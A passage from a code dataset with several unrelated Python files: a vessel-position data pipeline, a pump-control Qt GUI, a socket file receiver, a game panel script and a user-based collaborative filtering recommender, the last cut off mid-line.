query_filepath=\"monitorfish/reportings.sql\",\n    )\n\n\n@task(checkpoint=False)\ndef drop_duplicates(positions: pd.DataFrame) -> pd.DataFrame:\n    \"\"\"\n    Drop duplicate vessels in a `pandas.DataFrame` of positions, keeping only the most\n    recent position of each vessel.\n\n    This is required although the query that computes last positions already contains a\n    DISTINCT ON clause because for some vessels, we receive each position twice with\n    partially different identifiers - for instance, the same CFR but different ircs or\n    external immatriculation.\n\n    De-duplication is done using, by decreasing priority, vessel_id, CFR, ircs and\n    external_immatriculation.\n\n    Args:\n        positions (pd.DataFrame): positions of vessels. 
Must contain columns\n            \"vessel_id\", \"cfr\", \"external_immatriculation\", \"ircs\" and\n            \"last_position_datetime_utc\".\n\n    Returns:\n        pd.DataFrame: DataFrame of vessels' last position with duplicates removed.\n    \"\"\"\n    return drop_duplicates_by_decreasing_priority(\n        positions.sort_values(by=\"last_position_datetime_utc\", ascending=False),\n        subset=[\"vessel_id\", \"cfr\", \"ircs\", \"external_immatriculation\"],\n    )\n\n\n@task(checkpoint=False)\ndef extract_previous_last_positions() -> pd.DataFrame:\n    \"\"\"\n    Extracts the contents of the `last_positions` table (which was computed by the\n    previous run of the `last_positions` flow), with the `has_charter` field updated\n    by taking the current value in the `vessels` table.\n\n    Returns:\n        pd.DataFrame: DataFrame of vessels' last position (as it was last computed by\n            the last_positions flow).\n    \"\"\"\n    return extract(\n        db_name=\"monitorfish_remote\",\n        query_filepath=\"monitorfish/previous_last_positions.sql\",\n    )\n\n\n@task(checkpoint=False)\ndef drop_unchanged_new_last_positions(\n    new_last_positions: pd.DataFrame, previous_last_positions: pd.DataFrame\n) -> pd.DataFrame:\n    \"\"\"\n    Filters all positions of new_last_positions that are present in\n    previous_last_positions.\n\n    Args:\n        previous_last_positions (pd.DataFrame)\n        new_last_positions (pd.DataFrame)\n\n    Returns:\n        pd.DataFrame: subset of new_last_positions\n    \"\"\"\n    return new_last_positions[\n        ~new_last_positions.id.isin(set(previous_last_positions.id))\n    ].copy(deep=True)\n\n\n@task(checkpoint=False)\ndef split(\n    previous_last_positions: pd.DataFrame, new_last_positions: pd.DataFrame\n) -> Tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n    \"\"\"\n    Splits vessels into 3 categories:\n\n    - The ones that are in previous_last_positions only (known vessels that haven't\n    moved)\n    - The ones that are in new_last_positions only (new vessels never seen before)\n    - The ones in both datasets (known vessels that have moved and whose position must\n    be updated)\n\n    Returns the last_positions data of these 3 sets of vessels separately in 3\n    DataFrames. For vessels whose position must be updated, the returned DataFrame\n    contains the data of both the previous and the new last_position, in order to make\n    it possible to compute some metrics (i.e. 
the emission period).\n\n Args:\n previous_last_positions (pd.DataFrame)\n new_last_positions (pd.DataFrame)\n\n Returns:\n Tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n - unchanged_previous_last_positions\n - new_vessels_last_positions\n - last_positions_to_update\n \"\"\"\n\n previous_last_positions = previous_last_positions.copy(deep=True)\n new_last_positions = new_last_positions.copy(deep=True)\n\n vessel_id_cols = [\"vessel_id\", \"cfr\", \"ircs\", \"external_immatriculation\"]\n\n unchanged_previous_last_positions = previous_last_positions[\n ~left_isin_right_by_decreasing_priority(\n previous_last_positions[vessel_id_cols], new_last_positions[vessel_id_cols]\n )\n ]\n\n new_vessels_last_positions = new_last_positions[\n ~left_isin_right_by_decreasing_priority(\n new_last_positions[vessel_id_cols], previous_last_positions[vessel_id_cols]\n )\n ]\n\n last_positions_to_update = join_on_multiple_keys(\n (\n new_last_positions.rename(\n columns={\"last_position_datetime_utc\": \"last_position_datetime_utc_new\"}\n )\n ),\n (\n previous_last_positions[\n vessel_id_cols + [\"last_position_datetime_utc\"]\n ].rename(\n columns={\n \"last_position_datetime_utc\": \"last_position_datetime_utc_previous\"\n }\n )\n ),\n or_join_keys=vessel_id_cols,\n how=\"inner\",\n coalesce_common_columns=False,\n )\n\n return (\n unchanged_previous_last_positions,\n new_vessels_last_positions,\n last_positions_to_update,\n )\n\n\n@task(checkpoint=False)\ndef compute_emission_period(last_positions_to_update: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Computes the emission period of the last_positions that require an update.\n\n If an emission period is already present (which might happen if there are more\n than one position per vessel in the requested time period of the last_position\n query), this emission period is used. 
Otherwise, the emission period is taken to\n be equal to the time between the previous last_position_datetime_utc and the new\n last_position_datetime_utc.\n\n Args:\n last_positions_to_update (pd.DataFrame): last_positions data for vessels that\n have moved\n\n Returns:\n pd.DataFrame: updated last_positions with computed emission period field\n\n \"\"\"\n\n updated_last_positions = last_positions_to_update.copy(deep=True)\n\n updated_last_positions[\"new_to_previous_time_interval\"] = (\n updated_last_positions.last_position_datetime_utc_new\n - updated_last_positions.last_position_datetime_utc_previous\n )\n\n updated_last_positions.loc[:, \"emission_period\"] = coalesce(\n updated_last_positions[[\"emission_period\", \"new_to_previous_time_interval\"]]\n )\n\n updated_last_positions = updated_last_positions.drop(\n columns=[\"new_to_previous_time_interval\", \"last_position_datetime_utc_previous\"]\n ).rename(columns={\"last_position_datetime_utc_new\": \"last_position_datetime_utc\"})\n\n return updated_last_positions\n\n\n@task(checkpoint=False)\ndef concatenate(\n unchanged_previous_last_positions: pd.DataFrame,\n new_vessels_last_positions: pd.DataFrame,\n updated_last_positions: pd.DataFrame,\n) -> pd.DataFrame:\n \"\"\"\n Concatenates the 3 sets of last_positions and reindexes the rows from 1 to n.\n\n Args:\n unchanged_previous_last_positions (pd.DataFrame)\n new_vessels_last_positions (pd.DataFrame)\n updated_last_positions (pd.DataFrame)\n\n Returns:\n pd.DataFrame: concatenation of the 3 inputs sets of last_positions\n \"\"\"\n\n last_positions = (\n pd.concat(\n [\n unchanged_previous_last_positions,\n new_vessels_last_positions,\n updated_last_positions,\n ]\n )\n .reset_index()\n .drop(columns=[\"index\"])\n )\n\n return last_positions\n\n\n@task(checkpoint=False)\ndef extract_risk_factors():\n return extract(\n db_name=\"monitorfish_remote\",\n query_filepath=\"monitorfish/risk_factors.sql\",\n )\n\n\n@task(checkpoint=False)\ndef extract_beacon_malfunctions():\n return extract(\n db_name=\"monitorfish_remote\",\n query_filepath=\"monitorfish/beacon_malfunctions_for_last_positions.sql\",\n )\n\n\n@task(checkpoint=False)\ndef estimate_current_positions(\n last_positions: pd.DataFrame, max_hours_since_last_position: float\n) -> pd.DataFrame:\n \"\"\"\n\n Args:\n last_positions (pd.DataFrame): vessels' last position with route and speed\n data.\n max_hours_since_last_position (float): maximum time in hours since the last\n position above which the current position will not be extrapolated.\n\n Returns:\n pd.DataFrame: vessels' last position with added estimated_current_latitude and\n estimated_current_longitude fields\n\n \"\"\"\n\n last_positions = last_positions.copy(deep=True)\n now = datetime.utcnow()\n\n estimated_position_cols = [\n \"estimated_current_latitude\",\n \"estimated_current_longitude\",\n ]\n\n last_positions[estimated_position_cols] = last_positions.apply(\n lambda row: estimate_current_position(\n last_latitude=row[\"latitude\"],\n last_longitude=row[\"longitude\"],\n course=row[\"course\"],\n speed=row[\"speed\"],\n hours_since_last_position=(\n (now - row[\"last_position_datetime_utc\"]).total_seconds() / 3600\n ),\n max_hours_since_last_position=max_hours_since_last_position,\n on_error=\"ignore\",\n ),\n axis=1,\n result_type=\"expand\",\n )\n\n return last_positions\n\n\n@task(checkpoint=False)\ndef join(\n last_positions: pd.DataFrame,\n risk_factors: pd.DataFrame,\n pending_alerts: pd.DataFrame,\n reportings: pd.DataFrame,\n beacon_malfunctions: 
pd.DataFrame,\n) -> pd.DataFrame:\n \"\"\"\n Performs a left join on last_positions, risk_factors, pending_alerts, reportings and\n beacon_malfunctions using vessel_id cfr, ircs and external_immatriculation as join\n keys.\n \"\"\"\n join_keys = [\"vessel_id\", \"cfr\", \"ircs\", \"external_immatriculation\"]\n\n last_positions = join_on_multiple_keys(\n last_positions,\n risk_factors,\n or_join_keys=join_keys,\n how=\"left\",\n )\n\n last_positions = join_on_multiple_keys(\n last_positions,\n pending_alerts,\n or_join_keys=join_keys,\n how=\"left\",\n )\n\n last_positions = join_on_multiple_keys(\n last_positions,\n reportings,\n or_join_keys=join_keys,\n how=\"left\",\n )\n\n last_positions = join_on_multiple_keys(\n last_positions,\n beacon_malfunctions.rename(columns={\"id\": \"beacon_malfunction_id\"}),\n or_join_keys=join_keys,\n how=\"left\",\n )\n\n last_positions = last_positions.fillna(\n {**default_risk_factors, \"total_weight_onboard\": 0.0}\n ).astype({\"vessel_id\": float})\n\n return last_positions\n\n\n@task(checkpoint=False)\ndef load_last_positions(last_positions):\n load(\n last_positions,\n table_name=\"last_positions\",\n schema=\"public\",\n db_name=\"monitorfish_remote\",\n logger=prefect.context.get(\"logger\"),\n how=\"replace\",\n pg_array_columns=[\"segments\", \"alerts\", \"reportings\"],\n handle_array_conversion_errors=True,\n value_on_array_conversion_error=\"{}\",\n jsonb_columns=[\"gear_onboard\", \"species_onboard\"],\n nullable_integer_columns=[\"beacon_malfunction_id\", \"vessel_id\"],\n timedelta_columns=[\"emission_period\"],\n )\n\n\nwith Flow(\"Last positions\", executor=LocalDaskExecutor()) as flow:\n # Only run if the previous run has finished running\n flow_not_running = check_flow_not_running()\n with case(flow_not_running, True):\n healthcheck = get_monitorfish_healthcheck()\n positions_healthcheck = assert_positions_received_by_api_health(\n healthcheck=healthcheck\n )\n\n # Parameters\n current_position_estimation_max_hours = Parameter(\n \"current_position_estimation_max_hours\",\n default=CURRENT_POSITION_ESTIMATION_MAX_HOURS,\n )\n minutes = Parameter(\"minutes\", default=5)\n action = Parameter(\"action\", default=\"update\")\n action = validate_action(action, upstream_tasks=[positions_healthcheck])\n\n # Extract & Transform\n\n vessels_table = get_table(\"vessels\")\n\n risk_factors = extract_risk_factors(upstream_tasks=[positions_healthcheck])\n pending_alerts = extract_pending_alerts(upstream_tasks=[positions_healthcheck])\n reportings = extract_reportings(upstream_tasks=[positions_healthcheck])\n beacon_malfunctions = extract_beacon_malfunctions(\n upstream_tasks=[positions_healthcheck]\n )\n\n last_positions = extract_last_positions(minutes=minutes)\n last_positions = add_vessel_id(last_positions, vessels_table)\n last_positions = drop_duplicates(last_positions)\n last_positions = add_vessel_identifier(last_positions)\n last_positions = tag_positions_at_port(last_positions)\n\n with case(action, \"update\"):\n previous_last_positions = extract_previous_last_positions()\n previous_last_positions = add_vessel_id(\n previous_last_positions, vessels_table\n )\n previous_last_positions = drop_duplicates(previous_last_positions)\n new_last_positions = drop_unchanged_new_last_positions(\n last_positions, previous_last_positions\n )\n\n (\n unchanged_previous_last_positions,\n new_vessels_last_positions,\n last_positions_to_update,\n ) = split(previous_last_positions, new_last_positions)\n updated_last_positions = 
compute_emission_period(last_positions_to_update)\n\n last_positions_1 = concatenate(\n unchanged_previous_last_positions,\n new_vessels_last_positions,\n updated_last_positions,\n )\n\n with case(action, \"replace\"):\n last_positions_2 = last_positions\n\n last_positions = merge(last_positions_1, last_positions_2, checkpoint=False)\n\n last_positions = estimate_current_positions(\n last_positions=last_positions,\n max_hours_since_last_position=current_position_estimation_max_hours,\n )\n last_positions = join(\n last_positions,\n risk_factors,\n pending_alerts,\n reportings,\n beacon_malfunctions,\n )\n\n last_positions = drop_duplicates(last_positions)\n\n # Load\n load_last_positions(last_positions)\n\nflow.file_name = Path(__file__).name\n","repo_name":"MTES-MCT/monitorfish","sub_path":"datascience/src/pipeline/flows/last_positions.py","file_name":"last_positions.py","file_ext":"py","file_size_in_byte":16574,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"76"} +{"seq_id":"29729429972","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\ndataset = pd.read_csv('data.csv')\nx = dataset.iloc[:, 0].values\nhist, bins = np.histogram(x, bins = 4)\nprint(bins)\nplt.hist(x, bins = 4)\nplt.show()\nm = x.mean()\nprint(m)","repo_name":"saranthn/ExtractiveTextSummarizer-BERT","sub_path":"histogram_wcss.py","file_name":"histogram_wcss.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"33347665723","text":"from PyQt5.QtCore import Qt, QTimer\nfrom PyQt5.QtGui import QDoubleValidator\nfrom PyQt5.QtWidgets import (QWidget, QPushButton, QLabel, QGridLayout, QLineEdit, QGroupBox, QScrollArea, QRadioButton,\n QSlider)\n\nclass PumpArea(QScrollArea):\n \"\"\"Scroll area containing pump widgets.\"\"\"\n\n def __init__(self, pump_number, controller_settings, gui_settings, terminal, GUI_queues):\n super().__init__()\n\n # Queue and settings\n self.GUI_queues = GUI_queues\n self.terminal = terminal\n self.setWidgetResizable(True)\n self.horizontalScrollBar().setEnabled(True)\n self.verticalScrollBar().setEnabled(False)\n self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n # Create layout\n pump = QWidget()\n self.setWidget(pump)\n pump_layout = QGridLayout()\n pump_layout.setAlignment(Qt.AlignLeft)\n pump.setLayout(pump_layout)\n\n self.n_pumps = pump_number\n self.controller_settings = controller_settings\n\n # Add Pump widgets\n self.Pumps = []\n starting_columns = [0, 4, 8, 12, 16, 20, 24, 28]\n for i in range(1, self.n_pumps + 1):\n self.Pumps.append(Pump(i, self.process_gui_settings(gui_settings, i-1), terminal, GUI_queues))\n pump_layout.addWidget(self.Pumps[-1], 0, starting_columns[i - 1], -1, 4)\n \n # Poll the queue every 1000 ms\n self.timer = QTimer()\n self.timer.timeout.connect(self.process_queue)\n self.timer.start(100)\n\n def process_gui_settings(self, gui_settings, pump_number):\n \"\"\"Process gui_settings and returns values for a specific pump.\"\"\"\n pump_values = []\n keys = [\"pressure\", \"speed\", \"volume\"]\n for key, value in gui_settings.items():\n if key in keys:\n pump_values.append(value[pump_number])\n pump_values.append(self.controller_settings['Syringe volume (μl)'][pump_number])\n\n return pump_values\n\n def process_queue(self):\n \"\"\"Process To_GUI_queue and update widgets if new data is present.\"\"\"\n \n ln = self.GUI_queues[0].qsize()\n need_to_update = False\n for i in 
range(ln):\n msg = self.GUI_queues[0].get()\n \n # Check if the queue data is for the graph\n if msg[0] == \"ToGUI_PumpSpeeds\":\n need_to_update = True\n # Convert incoming data to floats\n pump_speeds = [float(item) for item in msg[1]]\n for i, pump_speed in enumerate(pump_speeds):\n self.Pumps[i].Speed = pump_speed\n\n elif msg[0] == \"ToGUI_PumpPositions\":\n need_to_update = True\n # Convert incoming data to floats\n pump_positions = [float(item) for item in msg[1]]\n for i, pump_position in enumerate(pump_positions):\n self.Pumps[i].Position = pump_position\n\n else:\n self.GUI_queues[0].put(msg) #message is for someone else\n \n if need_to_update:\n for p_i in self.Pumps:\n p_i.update()\n\nclass Pump(QGroupBox):\n \"\"\"Individual pump widget.\"\"\"\n\n def __init__(self, pump_number, pump_values, terminal, GUI_queues):\n super().__init__()\n \n self.terminal = terminal\n self.GUI_queues = GUI_queues\n self.pump_number = pump_number\n self.Speed = 0.0\n self.Position = 0.0\n self.MaxPosition = pump_values[3]\n self.pres_reg_on = False\n \n # Set title and layout\n self.setTitle(\"Pump \" + str(pump_number))\n self.pump_layout = QGridLayout(self)\n self.setLayout(self.pump_layout)\n\n # Set validators\n self.validator = QDoubleValidator(self)\n self.validator.setNotation(QDoubleValidator.ScientificNotation)\n self.volume_validator = QDoubleValidator(self)\n self.validator.setNotation(QDoubleValidator.ScientificNotation)\n \n # Create and configure elements\n self.pressure_label = QLabel(self, text=\"Pressure (kPa)\", alignment=Qt.AlignLeft)\n self.pressure_box = QLineEdit(text=pump_values[0])\n self.pressure_box.setValidator(self.validator)\n self.pressure_box.returnPressed.connect(self.on_pressure_entered)\n self.pressure_set = QPushButton(text=\"Pressure set\")\n self.pressure_set.clicked.connect(self.on_pressure_entered)\n self.pressure_regulate = QPushButton(text=\"Pressure regulate\")\n self.pressure_regulate.clicked.connect(self.on_pressure_regulate)\n\n self.speed_label = QLabel(self, text=\"Speed (μl/s)\")\n self.speed_box = QLineEdit(text=pump_values[1])\n self.speed_box.setValidator(self.validator)\n self.speed_box.returnPressed.connect(self.on_speed_entered)\n\n self.volume_label = QLabel(self, text=\"Volume (μl)\")\n self.volume_box = QLineEdit(text=pump_values[2])\n self.volume_box.setValidator(self.volume_validator)\n self.volume_box.returnPressed.connect(lambda: self.on_volume_entered(True))\n\n self.movebk_button = QPushButton(text=\"Move Back\")\n self.movebk_button.clicked.connect(lambda: self.on_volume_entered(False)) \n self.move_button = QPushButton(text=\"Move\")\n self.move_button.clicked.connect(lambda: self.on_volume_entered(True))\n\n self.move_absolute = QRadioButton(\"Move absolute\")\n self.move_absolute.clicked.connect(self.on_movetype)\n self.move_relative = QRadioButton(\"Move relative\")\n self.move_relative.clicked.connect(self.on_movetype)\n self.move_relative.setChecked(True)\n\n self.home_box = QGroupBox(\"Home pump\")\n self.home_layout = QGridLayout(self)\n self.home_box.setLayout(self.home_layout)\n\n self.home_up_button = QPushButton(text=\"Max\")\n self.home_up_button.clicked.connect(lambda: self.on_home(False))\n self.home_down_button = QPushButton(text=\"Zero\")\n self.home_down_button.clicked.connect(lambda: self.on_home(True))\n\n self.home_layout.addWidget(self.home_up_button, 0, 1, 1, 1)\n self.home_layout.addWidget(self.home_down_button, 0, 0, 1, 1)\n\n self.speed_display = QLabel(self, text=\"Speed (μl/s): 0.0\")\n 
self.speed_display.setFixedWidth(125)\n self.position_display = QLabel(self, text=\"Position (μl): 0.0\")\n self.position_display.setFixedWidth(125)\n\n self.slider = QSlider(Qt.Horizontal)\n self.slider.setValue(100)\n self.slider.sliderReleased.connect(self.on_slider_released)\n\n # Add elements to layout\n self.pump_layout.addWidget(self.pressure_label, 0, 0)\n self.pump_layout.addWidget(self.pressure_box, 0, 1)\n self.pump_layout.addWidget(self.pressure_set, 1, 0)\n self.pump_layout.addWidget(self.pressure_regulate, 1, 1)\n\n self.pump_layout.addWidget(self.speed_label, 2, 0)\n self.pump_layout.addWidget(self.speed_box, 2, 1)\n self.pump_layout.addWidget(self.volume_label, 3, 0)\n self.pump_layout.addWidget(self.volume_box, 3, 1)\n self.pump_layout.addWidget(self.movebk_button, 4, 1)\n self.pump_layout.addWidget(self.move_button, 4, 0)\n\n self.pump_layout.addWidget(self.move_absolute, 5, 0)\n self.pump_layout.addWidget(self.move_relative, 5, 1)\n\n self.pump_layout.addWidget(self.home_box, 6, 0, 1, -1)\n\n self.pump_layout.addWidget(self.speed_display, 7, 0)\n self.pump_layout.addWidget(self.position_display, 8, 0)\n self.pump_layout.addWidget(self.slider, 8, 1, 1, -1, Qt.AlignCenter)\n\n def update(self):\n self.speed_display.setText (f\"Speed (μl/s): {self.Speed:.2f}\")\n self.position_display.setText (f\"Position (μl): {self.Position:.0f}\")\n value = self.Position/self.MaxPosition*100\n self.slider.setValue(int(round(value)))\n\n def on_pressure_entered(self):\n # This function is called when the user enters data in pressure_box\n value = float(self.pressure_box.text())\n self.GUI_queues[1].put([\"FromGUI_Target\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"Target {self.pump_number-1} {value}\")\n \n \n def on_pressure_regulate(self):\n if self.pres_reg_on:\n self.GUI_queues[1].put([\"FromGUI_StopAdjust\", [self.pump_number-1]])\n self.terminal.print_text(f\"StopAdjust {self.pump_number-1}\")\n self.pres_reg_on = False\n \n else:\n self.on_pressure_entered()\n self.GUI_queues[1].put([\"FromGUI_StartAdjust\", [self.pump_number-1]])\n self.terminal.print_text(f\"StartAdjust {self.pump_number-1}\")\n self.pres_reg_on = True\n \n def on_speed_entered(self):\n # This function is called when the user enters data in pressure_box\n value = float(self.speed_box.text())\n self.GUI_queues[1].put([\"FromGUI_Speed\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"Speed {self.pump_number-1} {value}\")\n\n def on_volume_entered(self, forward):\n # This function is called when the user enters data in pressure_box\n value = float(self.volume_box.text())\n if not forward:\n value = -value\n self.on_speed_entered()\n if self.move_absolute.isChecked():\n self.GUI_queues[1].put([\"FromGUI_MoveAbs\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"MoveAbs {self.pump_number-1} {value}\")\n else:\n self.GUI_queues[1].put([\"FromGUI_MoveRel\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"MoveRel {self.pump_number-1} {value}\")\n \n def on_movetype(self):\n if self.move_relative.isChecked():\n self.movebk_button.setEnabled(True)\n self.volume_validator.setBottom(float('-inf'))\n else:\n value = float(self.volume_box.text())\n self.volume_box.setText(str(abs(value)))\n self.movebk_button.setEnabled(False)\n self.volume_validator.setBottom(0.0)\n \n def on_home(self, zero_dir):\n value = 1\n if zero_dir:\n value = 0\n self.GUI_queues[1].put([\"FromGUI_Home\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"Home {self.pump_number-1} 
{value}\")\n \n def on_slider_released(self):\n value = self.slider.value()\n value = value / 100.0 * self.MaxPosition\n self.on_speed_entered()\n self.GUI_queues[1].put([\"FromGUI_MoveAbs\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"MoveAbs {self.pump_number-1} {value}\")\n \n\n\n","repo_name":"manatee-fluidics/Manatee","sub_path":"GUI/main_window_pumps.py","file_name":"main_window_pumps.py","file_ext":"py","file_size_in_byte":10691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29275212708","text":"from kfile import *\nfrom khost import *\nimport socket\n\n\nclass KReceiver:\n def __init__(self, khost, kfilewriter):\n \"\"\"\n :param khost: Information of sender\n :param kfilewriter: Information of file that will be created\n\n :type khost: KHost\n :type kfilewriter: KFileWriter\n \"\"\"\n self.sender = khost\n self.file = kfilewriter\n\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.bind((khost.addr, khost.port))\n self.socket.listen(2)\n\n def start_listening(self):\n print(\"Listening for coming connactions...\")\n sender, addr = self.socket.accept()\n\n print(\"[*] Accepted connection from : %s:%d\" % (addr[0], addr[1]))\n self.start_receiving(sender)\n\n def start_receiving(self, sender):\n # Receive header\n header = self.recv(sender).decode(\"utf-8\")\n self.file.header_to_file(header)\n print(\"[*] Header is received : \" + header)\n\n # Receive data till |END| flag is received\n while True:\n data = self.recv(sender)\n if data == b\"\":\n break\n self.file.write(data)\n\n self.file.finish_writing()\n\n # Receive end flag\n finish_flag = self.recv(sender).decode(\"utf-8\")\n self.socket.close()\n\n if finish_flag == \"|END|\":\n print(\"Receiving successfuly finished.\")\n return 1\n\n print(\"Receiving is not successful. 
Missing finish flag.\")\n        return 0\n\n    def recv(self, sender):\n        data = sender.recv(16).decode(\"utf-8\")\n        # print(\"DATA :\", data)\n        data_len = int(data)\n        # data_len = int(sender.recv(16).decode(\"utf-8\"))\n        return sender.recv(data_len)\n\n\nif __name__ == \"__main__\":\n    host = KHost(\"0.0.0.0\", 9301)\n    file = KFileWriter(\"/home/ft/Downloads/new-ft.zip\")\n\n    receiver = KReceiver(host, file)\n    receiver.start_listening()\n    receiver.socket.close()\n","repo_name":"furkantokac/KLocalShare","sub_path":"src/kreceiver.py","file_name":"kreceiver.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"26365757129","text":"import input\n\nimport math\n\nfrom bge import logic\n\nclass Panel(object):\n    def __init__(self):\n        self.scene = logic.getCurrentScene()\n        self.reverse_x_button = self.scene.objects['ReverseXButton']\n        self.reverse_y_button = self.scene.objects['ReverseYButton']\n        self.camera = self.scene.objects['CommandPanelCamera']\n        self.restore = None\n        self.reverse_x = False\n        self.reverse_y = False\n\n    def enable(self):\n        self.scene.active_camera = self.camera\n        input.service.push_mouse_hooks({\n            'ReverseXButton': lambda : self.toggle_x(),\n            'ReverseYButton': lambda : self.toggle_y(),\n            'CommandPanelExitButton': lambda : self.exit(),\n            })\n        input.service.push_keyboard_hooks({})\n\n    def toggle_x(self):\n        self.reverse_x = not self.reverse_x\n        if self.reverse_x:\n            self.reverse_x_button.playAction('ReverseXButtonAction', 0, 30,\n                                             play_mode = logic.KX_ACTION_MODE_PLAY,\n                                             layer = 0,\n                                             speed = 5.0)\n        else:\n            self.reverse_x_button.playAction('ReverseXButtonAction', 30, 60,\n                                             play_mode = logic.KX_ACTION_MODE_PLAY,\n                                             layer = 1,\n                                             speed = 5.0)\n\n    def toggle_y(self):\n        self.reverse_y = not self.reverse_y\n        if self.reverse_y:\n            self.reverse_y_button.playAction('ReverseYButtonAction', 0, 30,\n                                             play_mode = logic.KX_ACTION_MODE_PLAY,\n                                             layer = 0,\n                                             speed = 5.0)\n        else:\n            self.reverse_y_button.playAction('ReverseYButtonAction', 30, 60,\n                                             play_mode = logic.KX_ACTION_MODE_PLAY,\n                                             layer = 0,\n                                             speed = 5.0)\n\n    def exit(self):\n        input.service.pop_mouse_hooks()\n        input.service.pop_keyboard_hooks()\n        self.restore()\n\npanel = Panel()\n\n","repo_name":"alex-ac/edugame-contest-project","sub_path":"panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"34418990355","text":"from common import *\nimport math\n\n\nglobal_userSimilarities = dict()\n\n# Get the item categories that two users have both interacted with\ndef getItemIntersectionByUser(user1, user2):\n\titemsUser1_Opted = set(global_user_item_dict[user1].keys())\n\titemsUser2_Opted = set(global_user_item_dict[user2].keys())\n\n\treturn itemsUser1_Opted.union(itemsUser2_Opted) ^ (itemsUser1_Opted ^ itemsUser2_Opted)\n\n# User similarity is computed here from how many identical item categories two users have interacted with,\n# not from how many identical items, because the items in test do not all appear in train\ndef userSimilarity_IIF():\n\tprint(getCurrentTime(), \" userSimilarity_IIF\")\n\titem_category_cnt = len(global_item_user_dict)\n\titem_category_idx = 0\n\n\tfor (item_id, user_ids) in global_item_user_dict.items():\t\t\n\t\titem_category_idx += 1\n\t\tuserCnt = len(user_ids)\n\t\tuser_id_list = list(user_ids)\n\t\tuserIdx1 = 0\n\t\tprint(\"%s userCF: item category %s [%d/%d] is operated by %d users.\" % \\\n\t\t     (getCurrentTime(), item_id, item_category_idx, item_category_cnt, userCnt))\n\n\t\twhile (userIdx1 < userCnt):\n\t\t\tuserIdx2 = userIdx1 + 
1\n\t\t\twhile (userIdx2 < userCnt):\n\t\t\t\tuser1_id = user_id_list[userIdx1]\n\t\t\t\tuser2_id = user_id_list[userIdx2]\n\n\t\t\t\tuserIdx2 += 1\n\n\t\t\t\t# 查看是否已经计算过 user1, user2的相似度,若没有,则将sim 插入到\n\t\t\t\t# global_userSimilarities[key1][key2] 的位置\n\t\t\t\t# key1, key2 分别为 < user1, user2> or \n\t\t\t\tkey1, key2 = getPosOfDoubleHash(user1_id, user2_id, global_userSimilarities)\n\t\t\t\tif (key1 == None):\n\t\t\t\t\tcontinue\n\n\t\t\t\titemCatsUser1and2_Opted = getItemIntersectionByUser(user1_id, user2_id)\n\t\t\t\tsim = 0.0\n\t\t\t\tfor item_category in itemCatsUser1and2_Opted:\n\t\t\t\t\tsim += 1 / math.log(1 + len(global_item_user_dict[item_category][USER_ID]))\n\n\t\t\t\tsim /= math.sqrt( len(global_user_item_dict[user1_id]) * \\\n\t \t len(global_user_item_dict[user2_id]) )\n\n\t\t\t\tglobal_userSimilarities[key1][key2] = sim\n\n\t\t\t\tlogging.info(\"%s userCF [%s -- %s] = %.3f\" % (getCurrentTime(), key1, key2, sim))\n\n\t\t\tuserIdx1 += 1\n\n\treturn 0\n\ndef recommendationUserCF(topK):\n\tlogging.info(\"recommendationUserCF topK %d\", topK)\n\n\tuser_sim_topK = dict()\n\n\tfor user1_id in global_userSimilarities.keys():\n\t\tlogging.info(\"calculating similiarity for %s\" % user1_id)\n\t\t\n\t\t\n\t\tuser_sim_topK[user1_id] = []\n\t\tusers_no_sim = \"\"\n\n\t\t# 计算每个用户相似度的 topK\n\t\tfor user2_id in global_userSimilarities.keys():\n\t\t\tif (user1_id == user2_id):\n\t\t\t\tcontinue\n\n\t\t\tsimiliarity = 0.0\n\t\t\tif (user2_id in global_userSimilarities[user1_id]):\n\t\t\t\tsimiliarity = global_userSimilarities[user1_id][user2_id]\n\t\t\telif (user1_id in global_userSimilarities[user2_id]):\n\t\t\t\tsimiliarity = global_userSimilarities[user2_id][user1_id]\n\t\t\telse:\n\t\t\t\tusers_no_sim += \"%s \" % user2_id\n\t\t\t\tcontinue\n\n\t\t\t# topK 是一个数组, 数组中的每个元素是一个两个元素的数组,第一个是user id, 第二个是similiarity\n\t\t\tif (len(user_sim_topK[user1_id]) < topK):\n\t\t\t\tuser_sim_topK[user1_id].append([user2_id, similiarity])\n\t\t\telse:\n\t\t\t\tmax_sim = 0\n\t\t\t\tmin_sim = 0\n\n\t\t\t\tfor idx in range(topK):\n\t\t\t\t\tif (user_sim_topK[user1_id][min_sim][1] > user_sim_topK[user1_id][idx][1]):\n\t\t\t\t\t\tmin_sim = idx\n\n\t\t\t\tif (similiarity > user_sim_topK[user1_id][min_sim][1]):\n\t\t\t\t\tuser_sim_topK[user1_id][min_sim][0] = user2_id\n\t\t\t\t\tuser_sim_topK[user1_id][min_sim][1] = similiarity\n\n\t\t\t\t# \tif (user_sim_topK[user1_id][max_sim][1] < user_sim_topK[user1_id][idx][1]):\n\t\t\t\t# \t\tmax_sim = idx\n\n\t\t\t\t# if (similiarity > user_sim_topK[user1_id][min_sim][1] and \\\n\t\t\t\t# \tsimiliarity < user_sim_topK[user1_id][max_sim][1]):\n\t\t\t\t# \tuser_sim_topK[user1_id][min_sim][0] = user2_id\n\t\t\t\t# \tuser_sim_topK[user1_id][min_sim][1] = similiarity\n\n\t\tif (len(users_no_sim) > 0):\n\t\t\tlogging.info(\"%s has no similiarity with following users: %s\" % (user1_id, 